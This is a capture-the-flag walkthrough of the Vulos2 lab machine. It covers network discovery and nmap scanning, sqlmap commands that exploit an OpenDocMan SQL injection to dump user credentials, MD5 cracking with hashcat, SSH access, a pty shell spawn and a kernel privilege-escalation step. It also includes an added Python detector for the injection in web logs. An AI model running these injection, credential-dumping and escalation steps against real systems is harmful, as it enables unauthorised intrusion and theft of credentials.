Vulos2
Tools:
- netdiscover
- Nmap
- Wfuzz
- Nikto
- sqlmap
- hash-identifier
Vulnerability:
Use netdiscover to detect the target IP address:
netdiscover -i eth0 -r 192.168.56.0/24
192.168.56.104 is the target.
Then run nmap to detect open ports and running services on the target machine.
nmap -sV -v -O -A -T5 192.168.56.104 -p-
Ports 22, 80 and 6667 are open.
Use wfuzz to scan. Nothing interesting.
Use Nikto to scan. Same.
Check the webpage; it looks like a link may be useful.
Double click it.
Examine the links. In Document, I found this:
Looks like path /jabcd0cs/ is available.
Go to http://192.168.56.104/jabcd0cs/, I found the app is OpenDocMan v1.2.7.
searchsploit opendocman
Got the exploit. Try the SQL injection vulnerability:
Now I know the database type is MySQL.
Next try to dump all table names
Looks like odm_user is the table I want to take a look at.
Now dump columns from table odm_user:
sqlmap -u "http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -T odm_user --columns --dbms=mysql
Looks like username and password.
Now time to dump all content from username and password:
sqlmap -u "http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -C username,password --dump --dbms=mysql
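From the defender's side, the requests in the steps above leave a clear trail in the web server access log. The following is an added example, not part of the original write-up: it flags requests to ajax_udf.php whose add_value is not a plain identifier or whose User-Agent names sqlmap. It assumes Apache combined log format and that add_value should only ever hold a table-style identifier; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate add_value is a bare identifier such as "odm_user".
SAFE_VALUE = re.compile(r"^[A-Za-z0-9_]{1,64}$")
# Apache combined log format (assumed).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

def suspicious_requests(lines, endpoint="/jabcd0cs/ajax_udf.php", param="add_value"):
    """Return (ip, timestamp, reasons) for each request worth triaging."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format line
        url = urlsplit(m["target"])
        if url.path != endpoint:
            continue
        # parse_qs URL-decodes, so %20 and %27 are checked in decoded form.
        values = parse_qs(url.query, keep_blank_values=True).get(param, [])
        reasons = []
        if any(not SAFE_VALUE.match(v) for v in values):
            reasons.append("non-identifier add_value")
        if "sqlmap" in m["ua"].lower():
            reasons.append("sqlmap user agent")
        if reasons:
            findings.append((m["ip"], m["ts"], reasons))
    return findings

# Constructed sample log lines (not captured from a real host).
SAMPLE_LOG = [
    '192.168.56.1 - - [10/Oct/2024:13:55:36 +0000] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.56.1 - - [10/Oct/2024:13:56:01 +0000] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user HTTP/1.1" 200 512 "-" "sqlmap/1.0 (constructed)"',
    '192.168.56.1 - - [10/Oct/2024:13:56:02 +0000] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%20NULL HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
    '192.168.56.1 - - [10/Oct/2024:13:56:03 +0000] "GET /jabcd0cs/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, ts, reasons in suspicious_requests(SAMPLE_LOG):
        print(ip, ts, ", ".join(reasons))
```

The same identifier allowlist belongs in the application itself, in front of the query, so that a value failing the check is rejected before it reaches MySQL.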
Use hash-identifier to detect the hash type.
Looks like they are MD5.
Use hashcat to crack it:
hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
Only guest's password is cracked.
Found a very good website to crack MD5 online, http://md5cracker.org/, and got the cracked password webmin1980 for user webmin. Log in:
Not very helpful.
Try to ssh to the box using webmin.
Get a bash shell:
python -c 'import pty; pty.spawn("/bin/bash")'
First check the OS version:
uname -a
searchsploit 3.13.0
Try this exploit.
In Kali:
In target:
DONE